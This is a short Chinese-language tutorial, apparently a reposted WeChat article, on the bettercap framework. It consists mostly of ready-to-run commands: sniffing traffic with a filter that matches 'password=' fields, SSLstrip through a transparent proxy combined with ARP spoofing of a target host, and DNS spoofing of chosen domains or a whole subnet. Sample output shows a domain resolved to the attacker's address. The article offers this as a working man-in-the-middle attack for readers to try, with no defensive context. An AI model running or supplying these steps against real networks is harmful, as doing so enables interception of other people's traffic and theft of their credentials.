使用bettercap进行数据包嗅探
2019-09-08 10:28:46 Author: mp.weixin.qq.com(查看原文) 阅读量:69 收藏

bettercap是一个强大的、容易扩展和便携式框架编写的旨在提供安全研究人员,红队一个易于使用的、一体化的解决方案,具备他们可能需要的所有功能,以执行侦察和攻击WiFi网络扫描、蓝牙低功耗设备扫描,特征枚举,读写、无被动和主动IP网络主机探测和侦察、网络嗅探器、端口扫描

Kali Linux上可以通过apt install bettercap直接安装

net.sniff on   启动数据包嗅探器
net.sniff off   停止数据包嗅探器
net.sniff stats   打印数据包嗅探器会话配置和统计信息
net.fuzz on   为包含指定图层的每个嗅探数据包启用模糊测试
net.fuzz off   禁用模糊测试

set net.sniff.filter 'not arp'
set net.sniff.local true
set net.sniff.regexp '.*password=. '
get net.sniff.*
net.sniff on

透明HTTP(S)代理
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets 192.168.190.3
arp.spoof on
http.proxy on
net.sniff on

DNS欺骗
set dns.spoof.domains <domain1>,<domain2>,...
set dns.spoof.address <Target address>
欺骗整个子网:set dns.spoof.all true
dns.spoof on

ARP欺骗
arp.spoof off
set arp.spoof.targets 192.168.190.3
arp.spoof on

DNS/ARP欺骗
get dns.spoof.*     

dns.spoof.address: '192.168.1.3'

dns.spoof.all: 'false'

dns.spoof.domains: ': time.com'

get dns.spoof.*

arp.spoof.internal: 'true'

arp.spoof.targets: '192.168.1.6'

arp.spoof.whitelist: ''

C:\> nslookup time.com
服务器:csp1.zte.com.cn
地址:192.168.1.1

非权威答案:
名称:time.com
地址:192.168.1.3(Spoofed)
192.168.1.3(欺骗)

小伙伴们自行研究吧。


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&amp;mid=2650457248&amp;idx=3&amp;sn=65de477f5ee7919e44b9e3005db76823&amp;chksm=83bba144b4cc2852c9a005896b8f51f3260c5e456f41dc8f17a519b6f65322568aa50491968e#rd
如有侵权请联系:admin#unsafe.sh